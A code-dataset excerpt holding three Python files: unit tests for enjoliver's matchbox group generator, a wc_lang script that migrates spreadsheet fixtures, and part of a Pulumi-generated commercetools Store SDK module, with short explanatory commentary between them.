Dataset row schema (one row per source file): hexsha, size, ext, lang; per-metric (max-stars / max-issues / max-forks) repo path, name, head hexsha, licenses, count, and event datetimes; the file content; line-length and alphanumeric-fraction statistics; and the qsc_* code-quality signals (n-gram duplication fractions, character-class fractions, Python AST/structure checks), followed by `effective` and `hits`.
bd9449cc49c39e59a09de086c44e3ff46fef6bd2 | 11,491 bytes | py | Python | app/tests/unit/test_generate_groups.py | JulienBalestra/enjoliver @ 13b41d0c40a56ea212a88d3e4f3aee91a318f3f0 | MIT | 33 stars (2017-01-20 – 2021-08-21) | 8 issues | 5 forks

import os
from unittest import TestCase
import time

from app import generator


class TestGenerateGroups(TestCase):
    gen = generator.GenerateGroup
    unit_path = "%s" % os.path.dirname(__file__)
    tests_path = "%s" % os.path.split(unit_path)[0]
    test_matchbox_path = "%s/test_matchbox" % tests_path
    api_uri = "http://127.0.0.1:5000"

    @classmethod
    def setUpClass(cls):
        cls.gen = generator.GenerateGroup(
            api_uri=cls.api_uri,
            _id="etcd-proxy",
            name="etcd-proxy",
            profile="TestGenerateProfiles",
            matchbox_path=cls.test_matchbox_path
        )
        cls.gen.profiles_path = "%s/test_resources" % cls.tests_path

    def test_00_uri(self):
        ip = self.gen.api_uri
        self.assertIsNotNone(ip)

    def test_01_metadata(self):
        expect = {'etcd_initial_cluster': '',
                  'api_uri': '%s' % self.gen.api_uri,
                  'ssh_authorized_keys': []}
        self.gen._metadata()
        self.assertEqual(expect['api_uri'], self.gen._target_data["metadata"]["api_uri"])

    def test_990_generate(self):
        expect = {
            'profile': 'etcd-proxy.yaml',
            'metadata': {
                'api_uri': '%s' % self.gen.api_uri,
                'ssh_authorized_keys': []
            },
            'id': 'etcd-proxy',
            'name': 'etcd-proxy'
        }
        new = generator.GenerateGroup(
            api_uri=self.api_uri,
            _id="etcd-proxy",
            name="etcd-proxy",
            profile="etcd-proxy.yaml",
            matchbox_path=self.test_matchbox_path
        )
        result = new.generate()
        self.assertEqual(expect["profile"], result["profile"])
        self.assertEqual(expect["id"], result["id"])
        self.assertEqual(expect["name"], result["name"])
        self.assertEqual(expect["metadata"]["api_uri"], result["metadata"]["api_uri"])

    def test_991_dump(self):
        _id = "etcd-test-%s" % self.test_991_dump.__name__
        new = generator.GenerateGroup(
            api_uri=self.api_uri,
            _id=_id,
            name="etcd-test",
            profile="etcd-test.yaml",
            matchbox_path=self.test_matchbox_path
        )
        self.assertTrue(new.dump())
        self.assertTrue(os.path.isfile("%s/groups/%s.json" % (self.test_matchbox_path, _id)))
        self.assertFalse(new.dump())
        self.assertTrue(os.path.isfile("%s/groups/%s.json" % (self.test_matchbox_path, _id)))
        new = generator.GenerateGroup(
            api_uri=self.api_uri,
            _id=_id,
            name="etcd-test",
            profile="etcd-test.yaml",
            matchbox_path=self.test_matchbox_path,
            selector={"one": "selector"}
        )
        self.assertTrue(new.dump())
        self.assertTrue(os.path.isfile("%s/groups/%s.json" % (self.test_matchbox_path, _id)))
        os.remove("%s/groups/%s.json" % (self.test_matchbox_path, _id))


class TestGenerateGroupsSelectorLower(TestCase):
    gen = generator.GenerateGroup
    unit_path = "%s" % os.path.dirname(__file__)
    tests_path = "%s" % os.path.split(unit_path)[0]
    test_matchbox_path = "%s/test_matchbox" % tests_path
    api_uri = "http://127.0.0.1:5000"

    @classmethod
    def setUpClass(cls):
        os.environ["MATCHBOX_URI"] = "http://127.0.0.1:8080"
        os.environ["API_URI"] = "http://127.0.0.1:5000"
        cls.gen = generator.GenerateGroup(
            api_uri=cls.api_uri,
            _id="etcd-proxy",
            name="etcd-proxy",
            profile="TestGenerateProfiles",
            selector={"mac": "08:00:27:37:28:2e"},
            matchbox_path=cls.test_matchbox_path
        )

    @classmethod
    def tearDownClass(cls):
        pass

    def test_00_api_uri(self):
        ip = self.gen.api_uri
        self.assertIsNotNone(ip)

    def test_01_metadata(self):
        expect = {
            'api_uri': "%s" % self.gen.api_uri,
            'ssh_authorized_keys': []
        }
        self.gen._metadata()
        self.gen._target_data["metadata"]['ssh_authorized_keys'] = []
        self.assertEqual(expect, self.gen._target_data["metadata"])

    def test_02_selector(self):
        expect = {'mac': '08:00:27:37:28:2e'}
        self.gen._selector()
        self.assertEqual(expect, self.gen._target_data["selector"])

    def test_990_generate(self):
        expect = {
            'profile': 'etcd-proxy.yaml',
            'metadata': {
                'api_uri': self.gen.api_uri,
                'selector': {'mac': '08:00:27:37:28:2e'},
                'ssh_authorized_keys': []
            },
            'id': 'etcd-proxy',
            'name': 'etcd-proxy',
            'selector': {'mac': '08:00:27:37:28:2e'}
        }
        new = generator.GenerateGroup(
            api_uri=self.api_uri,
            _id="etcd-proxy", name="etcd-proxy", profile="etcd-proxy.yaml",
            selector={"mac": "08:00:27:37:28:2e"},
            matchbox_path=self.test_matchbox_path)
        result = new.generate()
        result["metadata"]['ssh_authorized_keys'] = []
        self.assertEqual(expect, result)

    def test_991_dump(self):
        _id = "etcd-test-%s" % self.test_991_dump.__name__
        new = generator.GenerateGroup(
            api_uri=self.api_uri,
            _id="%s" % _id, name="etcd-test", profile="etcd-test.yaml",
            matchbox_path=self.test_matchbox_path,
            selector={"mac": "08:00:27:37:28:2e"}
        )
        self.assertTrue(new.dump())
        self.assertTrue(os.path.isfile("%s/groups/%s.json" % (self.test_matchbox_path, _id)))
        os.remove("%s/groups/%s.json" % (self.test_matchbox_path, _id))


class TestGenerateGroupsSelectorUpper(TestCase):
    gen = generator.GenerateGroup
    unit_path = "%s" % os.path.dirname(__file__)
    tests_path = "%s" % os.path.split(unit_path)[0]
    test_matchbox_path = "%s/test_matchbox" % tests_path
    api_uri = "http://127.0.0.1:5000"

    @classmethod
    def setUpClass(cls):
        os.environ["MATCHBOX_URI"] = "http://127.0.0.1:8080"
        os.environ["API_URI"] = "http://127.0.0.1:5000"
        cls.gen = generator.GenerateGroup(
            api_uri=cls.api_uri,
            _id="etcd-proxy",
            name="etcd-proxy",
            profile="TestGenerateProfiles",
            selector={"mac": "08:00:27:37:28:2E"},
            matchbox_path=cls.test_matchbox_path
        )

    def test_00_ip_address(self):
        ip = self.gen.api_uri
        self.assertIsNotNone(ip)

    def test_01_metadata(self):
        expect = {
            'api_uri': "%s" % self.gen.api_uri,
            'ssh_authorized_keys': []
        }
        self.gen._metadata()
        self.gen._target_data["metadata"]['ssh_authorized_keys'] = []
        self.assertEqual(expect, self.gen._target_data["metadata"])

    def test_02_selector(self):
        expect = {'mac': '08:00:27:37:28:2e'}
        self.gen._selector()
        self.assertEqual(expect, self.gen._target_data["selector"])

    def test_990_generate(self):
        expect = {
            'profile': 'etcd-proxy.yaml',
            'metadata': {
                'api_uri': "%s" % self.gen.api_uri,
                'selector': {'mac': '08:00:27:37:28:2e'},
                'ssh_authorized_keys': []
            },
            'id': 'etcd-proxy',
            'name': 'etcd-proxy',
            'selector': {'mac': '08:00:27:37:28:2e'}
        }
        new = generator.GenerateGroup(
            api_uri=self.api_uri, _id="etcd-proxy",
            name="etcd-proxy",
            profile="etcd-proxy.yaml",
            selector={"mac": "08:00:27:37:28:2e"},
            matchbox_path=self.test_matchbox_path
        )
        result = new.generate()
        result["metadata"]['ssh_authorized_keys'] = []
        self.assertEqual(expect, result)

    def test_991_dump(self):
        _id = "etcd-test-%s" % self.test_991_dump.__name__
        new = generator.GenerateGroup(
            api_uri=self.api_uri,
            _id="%s" % _id, name="etcd-test", profile="etcd-test.yaml",
            matchbox_path=self.test_matchbox_path,
            selector={"mac": "08:00:27:37:28:2e"}
        )
        new.dump()
        self.assertTrue(os.path.isfile("%s/groups/%s.json" % (self.test_matchbox_path, _id)))
        os.remove("%s/groups/%s.json" % (self.test_matchbox_path, _id))


class TestGenerateGroupsExtraMetadata(TestCase):
    gen = generator.GenerateGroup
    unit_path = "%s" % os.path.dirname(__file__)
    tests_path = "%s" % os.path.split(unit_path)[0]
    test_matchbox_path = "%s/test_matchbox" % tests_path
    api_uri = "http://127.0.0.1:5000"

    @classmethod
    def setUpClass(cls):
        os.environ["MATCHBOX_URI"] = "http://127.0.0.1:8080"
        os.environ["API_URI"] = "http://127.0.0.1:5000"
        cls.gen = generator.GenerateGroup(
            api_uri=cls.api_uri,
            _id="etcd-proxy",
            name="etcd-proxy",
            profile="TestGenerateProfiles",
            selector={"mac": "08:00:27:37:28:2E"},
            metadata={"etcd_initial_cluster": "static0=http://192.168.1.1:2379",
                      "api_seed": "http://192.168.1.2:5000"},
            matchbox_path=cls.test_matchbox_path
        )

    def test_00_api_uri(self):
        ip = self.gen.api_uri
        self.assertIsNotNone(ip)

    def test_01_metadata(self):
        expect = {'etcd_initial_cluster': 'static0=http://192.168.1.1:2379',
                  'api_uri': "%s" % self.gen.api_uri,
                  'api_seed': 'http://192.168.1.2:5000',
                  'ssh_authorized_keys': []}
        self.gen._metadata()
        self.gen._target_data["metadata"]['ssh_authorized_keys'] = []
        self.assertEqual(expect, self.gen._target_data["metadata"])

    def test_02_selector(self):
        expect = {'mac': '08:00:27:37:28:2e'}
        self.gen._selector()
        self.assertEqual(expect, self.gen._target_data["selector"])

    def test_990_generate(self):
        expect = {
            'profile': 'etcd-proxy.yaml',
            'metadata': {
                'api_uri': "%s" % self.gen.api_uri,
                'selector': {'mac': '08:00:27:37:28:2e'},
                'ssh_authorized_keys': []
            },
            'id': 'etcd-proxy',
            'name': 'etcd-proxy',
            'selector': {'mac': '08:00:27:37:28:2e'}
        }
        new = generator.GenerateGroup(
            api_uri=self.api_uri,
            _id="etcd-proxy", name="etcd-proxy", profile="etcd-proxy.yaml",
            selector={"mac": "08:00:27:37:28:2e"},
            matchbox_path=self.test_matchbox_path
        )
        result = new.generate()
        result["metadata"]["ssh_authorized_keys"] = []
        self.assertEqual(expect, result)

    def test_991_dump(self):
        _id = "etcd-test-%s" % self.test_991_dump.__name__
        new = generator.GenerateGroup(
            api_uri=self.api_uri,
            _id="%s" % _id, name="etcd-test", profile="etcd-test.yaml",
            matchbox_path=self.test_matchbox_path,
            selector={"mac": "08:00:27:37:28:2e"}
        )
        self.assertTrue(new.dump())
        self.assertTrue(os.path.isfile("%s/groups/%s.json" % (self.test_matchbox_path, _id)))
        os.remove("%s/groups/%s.json" % (self.test_matchbox_path, _id))
        self.assertTrue(new.dump())
        for i in range(10):
            self.assertFalse(new.dump())
        new.api_uri = "http://google.com"
        self.assertTrue(new.dump())
        self.assertFalse(new.dump())
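The `test_991_dump` methods above encode a write-only-if-changed contract for `dump()`: the first call writes the group JSON and returns True, an identical repeat returns False, and any change to the group (a new selector, a new `api_uri`) makes the next call return True again. A minimal, self-contained sketch of that pattern follows; the helper name and JSON layout are illustrative, not enjoliver's actual implementation:

```python
import json
import os
import tempfile


def dump_if_changed(path, data):
    """Write `data` as JSON; return True only if the file was created or changed."""
    payload = json.dumps(data, sort_keys=True, indent=2)
    if os.path.isfile(path):
        with open(path) as f:
            if f.read() == payload:
                return False  # on-disk content already up to date
    with open(path, "w") as f:
        f.write(payload)
    return True


# Usage mirroring the test: the first dump writes, a repeat is a no-op,
# and mutating the group triggers a rewrite.
target = os.path.join(tempfile.mkdtemp(), "etcd-test.json")
group = {"id": "etcd-test", "profile": "etcd-test.yaml"}
assert dump_if_changed(target, group) is True
assert dump_if_changed(target, group) is False
group["api_uri"] = "http://google.com"
assert dump_if_changed(target, group) is True
```

Comparing serialized payloads (rather than mtimes) is what makes the repeated `assertFalse(new.dump())` loop in the last test cheap and deterministic.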
e52d89be005eafea537b32cd612b4e88736703c4 | 10,193 bytes | py | Python | migrations/run_custom_migration.py | KarrLab/wc_lang @ 113a8b473576fa9c13688d2deb71b4b2ab400a03 | MIT | 7 stars (2018-05-14 – 2021-05-20) | 142 issues | 4 forks

""" Migrate WC-lang-encoded files
:Author: Jonathan Karr <karr@mssm.edu>
:Date: 2020-04-27
:Copyright: 2020, Karr Lab
:License: MIT
"""
import copy
import os.path
import sys
import warnings

import wc_lang.io

sys.path.insert(0, 'migrations')
import migration_2020_04_27 as migration  # noqa: E402 -- needs the sys.path entry above
base_dir = os.path.expanduser('~/Documents')
paths = [
# wc_lang
{'path': 'wc_lang/tests/fixtures/example-model.xlsx'},
{'path': 'wc_lang/tests/fixtures/sbml-io.xlsx'},
{'path': 'wc_lang/tests/fixtures/sbml-io-transformed.xlsx'},
{'path': 'wc_lang/tests/fixtures/test_model.xlsx'},
{'path': 'wc_lang/tests/fixtures/test_validate_model.xlsx'},
{'path': 'wc_lang/tests/sbml/fixtures/static-model.xlsx'},
# wc_sim
{'path': 'wc_sim/examples/transcription_translation_hybrid_model/model.xlsx'},
{'path': 'wc_sim/examples/translation_metabolism_hybrid_model/model.xlsx'},
{'path': 'wc_sim/tests/fixtures/2_species_1_reaction.xlsx'},
{'path': 'wc_sim/tests/fixtures/2_species_1_reaction_with_rates_given_by_reactant_population.xlsx'},
{'path': 'wc_sim/tests/fixtures/2_species_a_pair_of_symmetrical_reactions_rates_given_by_reactant_population.xlsx'},
{'path': 'wc_sim/tests/fixtures/MetabolismAndGeneExpression.xlsx'},
{'path': 'wc_sim/tests/fixtures/test_dry_model.xlsx'},
{'path': 'wc_sim/tests/fixtures/test_dry_model_with_mass_computation.xlsx',
'ignore_extra_models': True},
{'path': 'wc_sim/tests/fixtures/test_dynamic_expressions.xlsx'},
{'path': 'wc_sim/tests/fixtures/test_model.xlsx',
'ignore_extra_models': True},
{'path': 'wc_sim/tests/fixtures/test_model_for_access_species_populations.xlsx'},
{'path': 'wc_sim/tests/fixtures/test_model_for_access_species_populations_steady_state.xlsx'},
{'path': 'wc_sim/tests/fixtures/test_new_features_model.xlsx'},
{'path': 'wc_sim/tests/fixtures/dynamic_tests/one_exchange_rxn_compt_growth.xlsx',
'ignore_extra_models': True},
{'path': 'wc_sim/tests/fixtures/dynamic_tests/stop_conditions.xlsx',
'ignore_extra_models': True},
{'path': 'wc_sim/tests/fixtures/dynamic_tests/one_reaction_linear.xlsx',
'ignore_extra_models': True},
{'path': 'wc_sim/tests/fixtures/dynamic_tests/template.xlsx',
'ignore_extra_models': True},
{'path': 'wc_sim/tests/fixtures/dynamic_tests/one_rxn_exponential.xlsx',
'ignore_extra_models': True},
{'path': 'wc_sim/tests/fixtures/dynamic_tests/static.xlsx',
'ignore_extra_models': True},
{'path': 'wc_sim/tests/submodels/fixtures/test_next_reaction_method_submodel.xlsx'},
{'path': 'wc_sim/tests/submodels/fixtures/test_next_reaction_method_submodel_2.xlsx'},
{'path': 'wc_sim/tests/submodels/fixtures/test_submodel.xlsx'},
{'path': 'wc_sim/tests/submodels/fixtures/test_submodel_no_shared_species.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/multialgorithmic/00001/00001-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/multialgorithmic/00003/00003-wc_lang_1_submodel.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/multialgorithmic/00003/00003-wc_lang_2_submodels.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/multialgorithmic/00003/00003-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/multialgorithmic/00007/00007-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/multialgorithmic/00020/00020-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/multialgorithmic/00021/00021-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/multialgorithmic/00030/00007-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/multialgorithmic/00030/00030-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/semantic/00001/00001-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/semantic/00002/00002-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/semantic/00003/00003-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/semantic/00004/00004-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/semantic/00005/00005-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/semantic/00006/00006-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/semantic/00010/00010-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/semantic/00014/00014-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/semantic/00015/00015-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/semantic/00017/00017-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/semantic/00018/00018-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/semantic/00019/00019-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/semantic/00020/00020-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/semantic/00021/00021-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/semantic/00022/00022-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/semantic/00028/00028-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/semantic/00054/00054-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/stochastic/00001/00001-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/stochastic/00003/00003-wc_lang_1_submodel.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/stochastic/00003/00003-wc_lang_2_submodels.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/stochastic/00003/00003-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/stochastic/00004/00004-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/stochastic/00007/00007-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/stochastic/00007_hybrid/00007_hybrid-wc_lang_old.xlsx',
'validate': False},
{'path': 'wc_sim/tests/fixtures/verification/cases/stochastic/00007_hybrid/00007_hybrid-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/stochastic/00012/00012-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/stochastic/00020/00020-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/stochastic/00021/00021-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/stochastic/00030/00030-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/stochastic/00037/00037-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/stochastic/transcription_translation/transcription_translation-wc_lang.xlsx',
'validate': False},
{'path': 'wc_sim/tests/fixtures/verification/testing/hybrid/transcription_translation/transcription_translation_correct_ssa.xlsx',
'validate': False},
{'path': 'wc_sim/tests/fixtures/verification/testing/hybrid/transcription_translation/transcription_translation_hybrid.xlsx',
'validate': False},
{'path': 'wc_sim/tests/fixtures/verification/testing/hybrid/transcription_translation/transcription_translation-wc_lang_JK.xlsx',
'validate': False},
{'path': 'wc_sim/tests/fixtures/verification/testing/hybrid/translation_metabolism/translation_metabolism_correct_ssa.xlsx',
'validate': False},
{'path': 'wc_sim/tests/fixtures/verification/testing/hybrid/translation_metabolism/translation_metabolism_hybrid.xlsx',
'validate': False},
{'path': 'wc_sim/tests/fixtures/verification/testing/multialgorithmic/00007/00007-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/testing/semantic/00001/00001-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/testing/semantic/00004/00004-wc_lang.xlsx',
'validate': False},
{'path': 'wc_sim/tests/fixtures/verification/testing/semantic/00054/00054-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/testing/stochastic/00001/00001-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/testing/stochastic/00006/00006-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/testing_ValidationSuite_run/stochastic/00001/00001-wc_lang.xlsx',
'validate': False},
{'path': 'wc_sim/tests/fixtures/verification/testing_ValidationSuite_run/stochastic/00006/00006-wc_lang.xlsx',
'validate': False},
# wc_test
{'path': 'wc_test/tests/fixtures/min_model.xlsx'},
# intro_to_wc_modeling
{'path': 'intro_to_wc_modeling/intro_to_wc_modeling/wc_modeling/wc_lang_tutorial/examples/example_model.xlsx'},
# wc_analysis
{'path': 'wc_analysis/tests/fixtures/test_model.xlsx'},
# mycoplasma_pneumoniae
{'path': 'mycoplasma_pneumoniae/mycoplasma_pneumoniae/model/model_calibration.xlsx'},
{'path': 'mycoplasma_pneumoniae/mycoplasma_pneumoniae/model/model_calibration_wDeg.xlsx'},
# h1_hesc
{'path': 'h1_hesc/tests/model/cell_cycle/fixtures/test_exponential_growth_in_M.xlsx'},
{'path': 'h1_hesc/tests/model/cell_cycle/fixtures/test_cyclin_dynamics.xlsx'},
{'path': 'h1_hesc/model/hesc_recon/hesc_recon_wc_data_model.xlsx'},
{'path': 'h1_hesc/tests/code/fixtures/eukaryote_model.xlsx'},
{'path': 'h1_hesc/tests/code/fixtures/mock_model.xlsx'},
# rand_wc_model_gen
{'path': 'rand_wc_model_gen/rand_wc_model_gen/model_gen/model.xlsx'},
{'path': 'rand_wc_model_gen/rand_wc_model_gen/model_gen/model_2.xlsx'},
]
# NOTE: this reassignment discards the full list above, so only the single
# fixture below is actually migrated.
paths = [
    {'path': 'wc_sim/tests/submodels/fixtures/test_next_reaction_method_submodel_2.xlsx'},
]
for i_path, path in enumerate(paths):
    print('Migrating path {} of {}: {}'.format(i_path + 1, len(paths), path['path']))
    abs_path = os.path.join(base_dir, path['path'])

    # migrate
    migration.transform(abs_path)

    # validate
    if path.get('validate', True):
        kwargs = copy.copy(path)
        kwargs.pop('path')
        if 'validate' in kwargs:
            kwargs.pop('validate')
        try:
            wc_lang.io.Reader().run(abs_path, **kwargs)
        except ValueError as err:
            warnings.warn('{} is invalid: {}'.format(path['path'], str(err)))
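The loop above relies on only one thing from the imported migration module: a `transform(abs_path)` callable that rewrites the file in place; validation is a separate, optional step. A toy stand-in showing that contract (the marker-appending body is purely illustrative, not the real 2020-04-27 migration):

```python
import os
import tempfile


def transform(abs_path):
    """Toy in-place migration: append a marker line so the change is observable."""
    with open(abs_path, "a") as f:
        f.write("# migrated 2020-04-27\n")


# Exercise the contract on a throwaway file.
fd, path = tempfile.mkstemp(suffix=".txt")
os.close(fd)
transform(path)
with open(path) as f:
    assert f.read().endswith("# migrated 2020-04-27\n")
```

Keeping migration and validation decoupled, as the runner does, means a file that migrates cleanly but fails `wc_lang.io.Reader` only produces a warning rather than aborting the batch.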
e5686505a7f367f1c159af3103ba63e2335a996e | 16,326 bytes | py | Python | sdk/python/pulumi_commercetools/store.py | unplatform-io/pulumi-commercetools @ b81b998f99995c2ab7eb05a45220d414ae414da3 | ECL-2.0, Apache-2.0 | 1 star | 2 issues

# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***

import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities

__all__ = ['StoreArgs', 'Store']


@pulumi.input_type
class StoreArgs:
    def __init__(__self__, *,
                 key: pulumi.Input[str],
                 distribution_channels: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 languages: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 name: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 supply_channels: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
        """
        The set of arguments for constructing a Store resource.
        :param pulumi.Input[str] key: User-specific unique identifier for the store. The key is mandatory and immutable. It is used to reference the store
        :param pulumi.Input[Sequence[pulumi.Input[str]]] distribution_channels: Set of ResourceIdentifier to a Channel with ProductDistribution
        :param pulumi.Input[Sequence[pulumi.Input[str]]] languages: [IETF Language Tag](https://en.wikipedia.org/wiki/IETF_language_tag)
        :param pulumi.Input[Mapping[str, Any]] name: [LocalizedString](https://docs.commercetools.com/api/types#localizedstring)
        :param pulumi.Input[Sequence[pulumi.Input[str]]] supply_channels: Set of ResourceIdentifier of Channels with InventorySupply
        """
        pulumi.set(__self__, "key", key)
        if distribution_channels is not None:
            pulumi.set(__self__, "distribution_channels", distribution_channels)
        if languages is not None:
            pulumi.set(__self__, "languages", languages)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if supply_channels is not None:
            pulumi.set(__self__, "supply_channels", supply_channels)

    @property
    @pulumi.getter
    def key(self) -> pulumi.Input[str]:
        """
        User-specific unique identifier for the store. The key is mandatory and immutable. It is used to reference the store
        """
        return pulumi.get(self, "key")

    @key.setter
    def key(self, value: pulumi.Input[str]):
        pulumi.set(self, "key", value)

    @property
    @pulumi.getter(name="distributionChannels")
    def distribution_channels(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Set of ResourceIdentifier to a Channel with ProductDistribution
        """
        return pulumi.get(self, "distribution_channels")

    @distribution_channels.setter
    def distribution_channels(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "distribution_channels", value)

    @property
    @pulumi.getter
    def languages(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        [IETF Language Tag](https://en.wikipedia.org/wiki/IETF_language_tag)
        """
        return pulumi.get(self, "languages")

    @languages.setter
    def languages(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "languages", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        [LocalizedString](https://docs.commercetools.com/api/types#localizedstring)
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="supplyChannels")
    def supply_channels(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Set of ResourceIdentifier of Channels with InventorySupply
        """
        return pulumi.get(self, "supply_channels")

    @supply_channels.setter
    def supply_channels(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "supply_channels", value)
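Every field of the generated `StoreArgs` goes through `pulumi.set`/`pulumi.get` rather than plain attribute storage, with `@property` pairs exposing snake_case names. A dependency-free sketch of that getter/setter indirection (the class names and helpers below are illustrative stand-ins, not the real pulumi runtime):

```python
class ArgsBase:
    """Minimal stand-in for pulumi's input-type storage: values live in a
    dict keyed by property name, accessed via get/set helpers."""

    def __init__(self):
        self._values = {}

    def _get(self, key):
        return self._values.get(key)

    def _set(self, key, value):
        self._values[key] = value


class StoreArgsSketch(ArgsBase):
    def __init__(self, key, languages=None):
        super().__init__()
        self._set("key", key)
        if languages is not None:  # optional fields are only stored when given
            self._set("languages", languages)

    @property
    def key(self):
        return self._get("key")

    @key.setter
    def key(self, value):
        self._set("key", value)


# The property pair makes attribute access transparently hit the dict.
args = StoreArgsSketch(key="my-store", languages=["en", "de"])
assert args.key == "my-store"
args.key = "other-store"
assert args._get("key") == "other-store"
```

Centralizing storage this way is what lets the real runtime track unknown/secret output values uniformly across every generated resource class.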
@pulumi.input_type
class _StoreState:
    def __init__(__self__, *,
                 distribution_channels: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 key: Optional[pulumi.Input[str]] = None,
                 languages: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 name: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 supply_channels: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 version: Optional[pulumi.Input[int]] = None):
        """
        Input properties used for looking up and filtering Store resources.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] distribution_channels: Set of ResourceIdentifier to a Channel with ProductDistribution
        :param pulumi.Input[str] key: User-specific unique identifier for the store. The key is mandatory and immutable. It is used to reference the store
        :param pulumi.Input[Sequence[pulumi.Input[str]]] languages: [IETF Language Tag](https://en.wikipedia.org/wiki/IETF_language_tag)
        :param pulumi.Input[Mapping[str, Any]] name: [LocalizedString](https://docs.commercetools.com/api/types#localizedstring)
        :param pulumi.Input[Sequence[pulumi.Input[str]]] supply_channels: Set of ResourceIdentifier of Channels with InventorySupply
        """
        if distribution_channels is not None:
            pulumi.set(__self__, "distribution_channels", distribution_channels)
        if key is not None:
            pulumi.set(__self__, "key", key)
        if languages is not None:
            pulumi.set(__self__, "languages", languages)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if supply_channels is not None:
            pulumi.set(__self__, "supply_channels", supply_channels)
        if version is not None:
            pulumi.set(__self__, "version", version)

    @property
    @pulumi.getter(name="distributionChannels")
    def distribution_channels(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Set of ResourceIdentifier to a Channel with ProductDistribution
        """
        return pulumi.get(self, "distribution_channels")

    @distribution_channels.setter
    def distribution_channels(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "distribution_channels", value)

    @property
    @pulumi.getter
    def key(self) -> Optional[pulumi.Input[str]]:
        """
        User-specific unique identifier for the store. The key is mandatory and immutable. It is used to reference the store
        """
        return pulumi.get(self, "key")

    @key.setter
    def key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "key", value)

    @property
    @pulumi.getter
    def languages(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        [IETF Language Tag](https://en.wikipedia.org/wiki/IETF_language_tag)
        """
        return pulumi.get(self, "languages")

    @languages.setter
